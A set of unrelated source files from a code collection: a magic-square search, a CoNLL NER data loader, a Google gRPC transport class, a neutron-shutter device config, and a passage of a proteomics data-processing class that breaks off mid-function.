the-stack_0_12340 | #coding:latin-1
class CarreMagique :
def __init__(self, coef) :
self.mat = [ [ coef[i+j*3] for i in range(3) ] for j in range(3) ]
def __str__(self) :
return "\n".join ( [ ",".join( [ str(n) for n in row ] ) for row in self.mat ] )
def __add__ (self, carre) :
coef = []
for i in range(3) :
for j in range(3) :
coef.append ( self.mat[i][j] + carre.mat[i][j])
return CarreMagique(coef)
def somme_ligne_colonne_diagonale(self):
tout = [ sum ( ligne ) for ligne in self.mat ] + \
[ sum ( [ self.mat[i][j] for j in range(3) ] ) for i in range(3) ] + \
[ sum ( [ self.mat[i][i] for i in range(3) ] ) ] + \
[ sum ( [ self.mat[2-i][i] for i in range(3) ] ) ]
return tout
def coefficient_unique(self):
d = { }
for ligne in self.mat :
for c in ligne :
d [c] = d.get(c,0) + 1
return len(d) == 9
def est_magique(self):
unique = self.coefficient_unique()
if not unique : return False
somme = self.somme_ligne_colonne_diagonale()
return min(somme) == max(somme)
def tous_les_carres_permutation_ligne12_meme_somme( permut = None, pos = 0):
if pos == 9 :
carre = CarreMagique (permut)
if carre.est_magique() :
#print (carre)
#print ()
return [ carre ]
else :
return []
else :
if pos >= 6 : # ajout
if sum ( permut[:3]) != sum(permut[3:6]) : # ajout
return [ ] # ajout
res = [ ]
if permut == None :
permut = [ i+1 for i in range(9) ]
for i in range (pos,9) :
# on permute les �l�ments i et pos
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
res += tous_les_carres_permutation_ligne12_meme_somme(permut, pos+1) # chang�
# on effectue la permutation inverse
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
return res
import time
d = time.perf_counter()
res = tous_les_carres_permutation_ligne12_meme_somme()
d = time.perf_counter() - d
print ("nombre de carr�s", len(res), " en ", d)
|
the-stack_0_12341 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
import codecs
import collections
import torch
import pickle
import utils
import torch.nn as nn
class Loader():
def __init__(self, target_dir):
self.target_dir = target_dir
self.char2idx = collections.defaultdict(int)
self.label2idx = {'O': 0, 'I': 1, 'B': 2}
def load(self,
data_file,
make_word_dict):
with codecs.open(data_file, 'r', 'utf-8') as r:
lines = r.readlines()
# Converting format
data_features, data_labels = read_corpus(lines)
if make_word_dict:
self.char2idx = make_dic(self.char2idx, doc_sent=data_features)
unk_char_id = len(self.char2idx) - 1
unk_label_id = len(self.label2idx) - 1
sents_idx = [[[self.char2idx.get(char, unk_char_id) for char in word] \
for word in sent] \
for sent in data_features]
'''
学習データがtoyの場合のデータサンプル
'''
'''
defaultdict(<class 'int'>, {'e': 0, 'a': 1, 'i': 2, 't': 3, 's': 4, 'n': 5,
'r': 6, 'o': 7, 'h': 8, 'd': 9, 'l': 10, 'c': 11, 'u': 12, 'm': 13, 'p': 14,
'g': 15, 'f': 16, 'y': 17, 'w': 18, '.': 19, 'S': 20, 'T': 21, 'b': 22, 'E': 23,
'I': 24, 'A': 25, 'v': 26, ',': 27, 'N': 28, '1': 29, 'P': 30, 'k': 31, 'R': 32,
'L': 33, '-': 34, '0': 35, '9': 36, 'O': 37, '2': 38, 'B': 39, 'G': 40, 'C': 41,
'M': 42, 'D': 43, 'U': 44, 'F': 45, '6': 46, 'K': 47, "'": 48, '"': 49, '5': 50,
'H': 51, 'q': 52, 'W': 53, 'J': 54, '4': 55, '7': 56, '3': 57, '8': 58, 'x': 59,
'Y': 60, 'V': 61, 'j': 62, '(': 63, ')': 64, '$': 65, '/': 66, '=': 67, 'z': 68,
'+': 69, 'X': 70, 'Q': 71, '&': 72, 'Z': 73, ':': 74, '<unk>': 75})
'''
#print(data_features)
'''
[['EU', 'rejects', 'German', 'call', 'to', 'boycott', 'British', 'lamb', '.'],
['Peter', 'Blackburn'], ...
'''
#print(sents_idx)
'''
[[[23, 44], [6, 0, 62, 0, 11, 3, 4], [40, 0, 6, 13, 1, 5], [11, 1, 10, 10],
[3, 7], [22, 7, 17, 11, 7, 3, 3], [39, 6, 2, 3, 2, 4, 8], [10, 1, 13, 22], [19]],
[[30, 0, 3, 0, 6], [39, 10, 1, 11, 31, 22, 12, 6, 5]], ...
'''
labels_idx = [[self.label2idx.get(label, unk_label_id) for label in labels] \
for labels in data_labels]
#print(labels_idx)
'''
[[1, 0, 1, 0, 0, 0, 1, 0, 0],
[1, 1], ...
'''
pickle.dump([self.char2idx, self.label2idx, sents_idx, labels_idx],
open(self.target_dir + "CoNLL_char_" + data_file[19:] + ".pkl", "wb"))
def read_corpus(lines):
"""
convert corpus into features and labels
"""
features = list()
labels = list()
tmp_fl = list()
tmp_ll = list()
for line in lines:
if not (line.isspace() or (len(line) > 10 and line[0:10] == '-DOCSTART-')):
line = line.rstrip('\n').split()
tmp_fl.append(line[0])
tmp_ll.append(line[-1][0])
elif len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
tmp_fl = list()
tmp_ll = list()
if len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
return features, labels
def make_dic(char2idx, doc_sent):
# 頻度順にソートしてidをふる
words = utils.flatten(doc_sent)
chars = utils.flatten(words)
counter = collections.Counter()
counter.update(chars)
cnt = 0
for char, count in counter.most_common():
# 出現回数1回以上の文字のみ辞書に追加
if count >= 1:
char2idx[char] = cnt
cnt += 1
char2idx[u'<unk>'] = len(char2idx)
return char2idx
def main():
torch.manual_seed(1)
TARGET_DIR = '../corpus/data/'
GLOVE_FILE = '../corpus/glove.6B/glove.6B.50d.txt'
#TRAIN_FILE = TARGET_DIR + 'eng.train' # 14041 sentences
#TEST_FILE = TARGET_DIR + 'eng.test'
TRAIN_FILE = TARGET_DIR + 'toy.train' # 143 sentences
TEST_FILE = TARGET_DIR + 'toy.test'
#TRAIN_FILE = TARGET_DIR + 'mid.train' # 3153 sentences
#TEST_FILE = TARGET_DIR + 'mid.test'
EMBEDDING_DIM = 50
loader = Loader(target_dir=TARGET_DIR)
#trainの時は単語の辞書を作成する
loader.load(data_file=TRAIN_FILE,
make_word_dict=True)
#testの時は単語の辞書を作成しない
loader.load(data_file=TEST_FILE,
make_word_dict=None)
if __name__ == '__main__':
main()
|
the-stack_0_12343 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.servicedirectory_v1beta1.types import lookup_service
from .base import LookupServiceTransport, DEFAULT_CLIENT_INFO
class LookupServiceGrpcTransport(LookupServiceTransport):
"""gRPC backend transport for LookupService.
Service Directory API for looking up service data at runtime.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def resolve_service(
self,
) -> Callable[
[lookup_service.ResolveServiceRequest], lookup_service.ResolveServiceResponse
]:
r"""Return a callable for the resolve service method over gRPC.
Returns a
[service][google.cloud.servicedirectory.v1beta1.Service] and its
associated endpoints. Resolving a service is not considered an
active developer method.
Returns:
Callable[[~.ResolveServiceRequest],
~.ResolveServiceResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "resolve_service" not in self._stubs:
self._stubs["resolve_service"] = self.grpc_channel.unary_unary(
"/google.cloud.servicedirectory.v1beta1.LookupService/ResolveService",
request_serializer=lookup_service.ResolveServiceRequest.serialize,
response_deserializer=lookup_service.ResolveServiceResponse.deserialize,
)
return self._stubs["resolve_service"]
def close(self):
self.grpc_channel.close()
__all__ = ("LookupServiceGrpcTransport",)
|
the-stack_0_12345 | description = 'FRM II neutron guide line 2b shutter'
group = 'lowlevel'
includes = ['guidehall']
tango_base = 'tango://ictrlfs.ictrl.frm2:10000/mlz/'
devices = dict(
NL2b = device('nicos.devices.tango.NamedDigitalInput',
description = 'NL2b shutter status',
mapping = {'closed': 0,
'open': 1},
pollinterval = 60,
maxage = 120,
tangodevice = tango_base + 'shutter/nl2b',
),
)
|
the-stack_0_12346 | import natsort
import numpy as np
import pandas as pd
import plotly.io as pio
import plotly.express as px
import plotly.graph_objects as go
import plotly.figure_factory as ff
import re
import traceback
from io import BytesIO
from sklearn.decomposition import PCA
from sklearn.metrics import pairwise as pw
import json
import statistics
import matplotlib.pyplot as plt
import matplotlib_venn as venn
from matplotlib_venn import venn2, venn3, venn3_circles
from PIL import Image
from upsetplot import from_memberships
from upsetplot import plot as upplot
import pkg_resources
def natsort_index_keys(x):
order = natsort.natsorted(np.unique(x.values))
return pd.Index([order.index(el) for el in x], name=x.name)
def natsort_list_keys(x):
order = natsort.natsorted(np.unique(x))
return [order.index(el) for el in x]
class SpatialDataSet:
regex = {
"imported_columns": "^[Rr]atio H/L (?!normalized|type|is.*|variability|count)[^ ]+|^Ratio H/L variability.... .+|^Ratio H/L count .+|id$|[Mm][Ss].*[cC]ount.+$|[Ll][Ff][Qq].*|.*[nN]ames.*|.*[Pp][rR]otein.[Ii][Dd]s.*|[Pp]otential.[cC]ontaminant|[Oo]nly.[iI]dentified.[bB]y.[sS]ite|[Rr]everse|[Ss]core|[Qq]-[Vv]alue|R.Condition|PG.Genes|PG.ProteinGroups|PG.Cscore|PG.Qvalue|PG.RunEvidenceCount|PG.Quantity|^Proteins$|^Sequence$"
}
acquisition_set_dict = {
"LFQ6 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"LFQ6 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"SILAC - MQ" : [ "[Rr]atio.[Hh]/[Ll](?!.[Vv]aria|.[Cc]ount)","[Rr]atio.[Hh]/[Ll].[Vv]ariability.\[%\]", "[Rr]atio.[Hh]/[Ll].[cC]ount"],
"Custom": ["(?!Protein IDs|Gene names)"]
}
Spectronaut_columnRenaming = {
"R.Condition": "Map", "PG.Genes" : "Gene names", "PG.Qvalue": "Q-value", "PG.Cscore":"C-Score",
"PG.ProteinGroups" : "Protein IDs", "PG.RunEvidenceCount" : "MS/MS count", "PG.Quantity" : "LFQ intensity"
}
css_color = ["#b2df8a", "#6a3d9a", "#e31a1c", "#b15928", "#fdbf6f", "#ff7f00", "#cab2d6", "#fb9a99", "#1f78b4", "#ffff99", "#a6cee3",
"#33a02c", "blue", "orange", "goldenrod", "lightcoral", "magenta", "brown", "lightpink", "red", "turquoise",
"khaki", "darkgoldenrod","darkturquoise", "darkviolet", "greenyellow", "darksalmon", "hotpink", "indianred", "indigo","darkolivegreen",
"coral", "aqua", "beige", "bisque", "black", "blanchedalmond", "blueviolet", "burlywood", "cadetblue", "yellowgreen", "chartreuse",
"chocolate", "cornflowerblue", "cornsilk", "darkblue", "darkcyan", "darkgray", "darkgrey", "darkgreen", "darkkhaki", "darkmagenta",
"darkorange", "darkorchid", "darkred", "darkseagreen", "darkslateblue", "snow", "springgreen", "darkslategrey", "mediumpurple", "oldlace",
"olive", "lightseagreen", "deeppink", "deepskyblue", "dimgray", "dimgrey", "dodgerblue", "firebrick", "floralwhite", "forestgreen",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"lightgoldenrodyellow", "lightgray", "lightgrey", "lightgreen", "lightsalmon", "lightskyblue", "lightslategray", "lightslategrey",
"lightsteelblue", "lightyellow", "lime", "limegreen", "linen", "maroon", "mediumaquamarine", "mediumblue", "mediumseagreen",
"mediumslateblue", "mediumspringgreen", "mediumturquoise", "mediumvioletred", "midnightblue", "mintcream", "mistyrose", "moccasin",
"olivedrab", "orangered", "orchid", "palegoldenrod", "palegreen", "paleturquoise", "palevioletred", "papayawhip", "peachpuff", "peru",
"pink", "plum", "powderblue", "rosybrown", "royalblue", "saddlebrown", "salmon", "sandybrown", "seagreen", "seashell", "sienna", "silver",
"skyblue", "slateblue", "steelblue", "teal", "thistle", "tomato", "violet", "wheat", "white", "whitesmoke", "slategray", "slategrey",
"aquamarine", "azure","crimson", "cyan", "darkslategray", "grey","mediumorchid","navajowhite", "navy"]
analysed_datasets_dict = {}
df_organellarMarkerSet = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/organellemarkers/{}.csv'.format("Homo sapiens - Uniprot")),
usecols=lambda x: bool(re.match("Gene name|Compartment", x)))
df_organellarMarkerSet = df_organellarMarkerSet.rename(columns={"Gene name":"Gene names"})
df_organellarMarkerSet = df_organellarMarkerSet.astype({"Gene names": "str"})
def __init__(self, filename, expname, acquisition, comment, name_pattern="e.g.:.* (?P<cond>.*)_(?P<rep>.*)_(?P<frac>.*)", reannotate_genes=False, **kwargs):
self.filename = filename
self.expname = expname
self.acquisition = acquisition
self.name_pattern = name_pattern
self.comment = comment
self.imported_columns = self.regex["imported_columns"]
self.fractions, self.map_names = [], []
self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
if acquisition == "SILAC - MQ":
if "RatioHLcount" not in kwargs.keys():
self.RatioHLcount = 2
else:
self.RatioHLcount = kwargs["RatioHLcount"]
del kwargs["RatioHLcount"]
if "RatioVariability" not in kwargs.keys():
self.RatioVariability = 30
else:
self.RatioVariability = kwargs["RatioVariability"]
del kwargs["RatioVariability"]
elif acquisition == "Custom":
self.custom_columns = kwargs["custom_columns"]
self.custom_normalized = kwargs["custom_normalized"]
self.imported_columns = "^"+"$|^".join(["$|^".join(el) if type(el) == list else el for el in self.custom_columns.values() if el not in [[], None, ""]])+"$"
#elif acquisition == "LFQ5 - MQ" or acquisition == "LFQ6 - MQ" or acquisition == "LFQ6 - Spectronaut" or acquisition == "LFQ5 - Spectronaut":
else:
if "summed_MSMS_counts" not in kwargs.keys():
self.summed_MSMS_counts = 2
else:
self.summed_MSMS_counts = kwargs["summed_MSMS_counts"]
del kwargs["summed_MSMS_counts"]
if "consecutiveLFQi" not in kwargs.keys():
self.consecutiveLFQi = 4
else:
self.consecutiveLFQi = kwargs["consecutiveLFQi"]
del kwargs["consecutiveLFQi"]
#self.markerset_or_cluster = False if "markerset_or_cluster" not in kwargs.keys() else kwargs["markerset_or_cluster"]
if "organism" not in kwargs.keys():
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format("Homo sapiens - Uniprot")))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
else:
assert kwargs["organism"]+".csv" in pkg_resources.resource_listdir(__name__, "annotations/complexes")
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(kwargs["organism"])))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.organism = kwargs["organism"]
del kwargs["organism"]
self.analysed_datasets_dict = {}
self.analysis_summary_dict = {}
def data_reading(self, filename=None, content=None):
"""
Data import. Can read the df_original from a file or buffer.
df_original contains all information of the raw file; tab separated file is imported,
Args:
self:
filename: string
imported_columns : dictionry; columns that correspond to this regular expression will be imported
filename: default None, to use the class attribute. Otherwise overwrites the class attribute upon success.
content: default None, to use the filename. Any valid input to pd.read_csv can be provided, e.g. a StringIO buffer.
Returns:
self.df_orginal: raw, unprocessed dataframe, single level column index
"""
# use instance attribute if no filename is provided
if filename is None:
filename = self.filename
# if no buffer is provided for the content read straight from the file
if content is None:
content = filename
if filename.endswith("xls") or filename.endswith("txt"):
self.df_original = pd.read_csv(content, sep="\t", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
else: #assuming csv file
self.df_original = pd.read_csv(content, sep=",", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
assert self.df_original.shape[0]>10 and self.df_original.shape[1]>5
self.filename = filename
return self.df_original
def processingdf(self, name_pattern=None, summed_MSMS_counts=None, consecutiveLFQi=None, RatioHLcount=None, RatioVariability=None, custom_columns=None, custom_normalized=None):
"""
Analysis of the SILAC/LFQ-MQ/LFQ-Spectronaut data will be performed. The dataframe will be filtered, normalized, and converted into a dataframe,
characterized by a flat column index. These tasks is performed by following functions:
indexingdf(df_original, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
spectronaut_LFQ_indexingdf(df_original, Spectronaut_columnRenaming, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
stringency_silac(df_index)
normalization_01_silac(df_stringency_mapfracstacked):
logarithmization_silac(df_stringency_mapfracstacked):
stringency_lfq(df_index):
normalization_01_lfq(df_stringency_mapfracstacked):
logarithmization_lfq(df_stringency_mapfracstacked):
Args:
self.acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
additional arguments can be used to override the value set by the class init function
Returns:
self:
map_names: list of Map names
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
df_log_stacked: df; log transformed data
analysis_summary_dict["0/1 normalized data - mean"] : 0/1 normalized data across all maps by calculating the mean
["changes in shape after filtering"]
["Unique Proteins"] : unique proteins, derived from the first entry of Protein IDs, seperated by a ";"
["Analysis parameters"] : {"acquisition" : ...,
"filename" : ...,
#SILAC#
"Ratio H/L count 1 (>=X)" : ...,
"Ratio H/L count 2 (>=Y, var<Z)" : ...,
"Ratio variability (<Z, count>=Y)" : ...
#LFQ#
"consecutive data points" : ...,
"summed MS/MS counts" : ...
}
"""
if name_pattern is None:
name_pattern = self.name_pattern
if self.acquisition == "SILAC - MQ":
if RatioHLcount is None:
RatioHLcount = self.RatioHLcount
if RatioVariability is None:
RatioVariability = self.RatioVariability
elif self.acquisition == "Custom":
if custom_columns is None:
custom_columns = self.custom_columns
if custom_normalized is None:
custom_normalized = self.custom_normalized
else:
if summed_MSMS_counts is None:
summed_MSMS_counts = self.summed_MSMS_counts
if consecutiveLFQi is None:
consecutiveLFQi = self.consecutiveLFQi
shape_dict = {}
def indexingdf():
"""
For data output from MaxQuant, all columns - except of "MS/MS count" and "LFQ intensity" (LFQ) | "Ratio H/L count", "Ratio H/L variability [%]"
(SILAC) - will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count", "LFQ intensity"| "Ratio H/L count", "Ratio H/L
variability [%]"), "Fraction" (= defined via "name_pattern") and "Map" (= defined via "name_pattern") as level names, allowing the stacking and
unstacking of the dataframe. The dataframe will be filtered by removing matches to the reverse database, matches only identified by site, and
potential contaminants.
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
acquisition_set_dict: dictionary, all columns will be set as index, except of those that are listed in acquisition_set_dict
acquisition: string, one of "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
df_index: mutliindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_original
shape_dict["Shape after categorical filtering"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_original.rename({"Proteins": "Protein IDs"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
# multindex will be generated, by extracting the information about the Map, Fraction and Type from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
[[re.findall(s, col)[0] for s in self.acquisition_set_dict[self.acquisition] if re.match(s,col)][0]
for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(1, inplace=True)
shape_dict["Original size"] = df_original.shape
try:
df_index = df_original.xs(
np.nan, 0, "Reverse")
except:
pass
try:
df_index = df_index.xs(
np.nan, 0, "Potential contaminant")
except:
pass
try:
df_index = df_index.xs(
np.nan, 0, "Only identified by site")
except:
pass
df_index.replace(0, np.nan, inplace=True)
shape_dict["Shape after categorical filtering"] = df_index.shape
df_index.rename(columns={"MS/MS Count":"MS/MS count"}, inplace=True)
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
##############Cyt should get only be removed if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - MQ":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def custom_indexing_and_normalization():
df_original = self.df_original.copy()
df_original.rename({custom_columns["ids"]: "Protein IDs", custom_columns["genes"]: "Gene names"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
# multindex will be generated, by extracting the information about the Map, Fraction and Type from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
["normalized profile" for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(1, inplace=True)
shape_dict["Original size"] = df_original.shape
# for custom upload assume full normalization for now. this should be extended to valid value filtering and 0-1 normalization later
df_index = df_original.copy()
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def spectronaut_LFQ_indexingdf():
"""
For data generated from the Spectronaut software, columns will be renamed, such it fits in the scheme of MaxQuant output data. Subsequently, all
columns - except of "MS/MS count" and "LFQ intensity" will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count" and
"LFQ intensity"), Fraction" and "Map" (= defined via "name_pattern"; both based on the column name R.condition - equivalent to the column name "Map"
in df_renamed["Map"]) as level labels.
!!!
!!!It is very important to define R.Fraction, R.condition already during the setup of Spectronaut!!!
!!!
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
Spectronaut_columnRenaming
acquisition_set_dict: dictionary, all columns will be set as index, except of those that are listed in acquisition_set_dict
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
df_index: mutliindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_renamed = df_original.rename(columns=self.Spectronaut_columnRenaming)
df_renamed["Fraction"] = [re.match(self.name_pattern, i).group("frac") for i in df_renamed["Map"]]
df_renamed["Map"] = [re.match(self.name_pattern, i).group("rep") for i in df_renamed["Map"]] if not "<cond>" in self.name_pattern else ["_".join(
re.match(self.name_pattern, i).group("cond", "rep")) for i in df_renamed["Map"]]
df_index = df_renamed.set_index([col for col in df_renamed.columns if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]])==False])
df_index.columns.names = ["Set"]
# In case fractionated data was used this needs to be catched and aggregated
try:
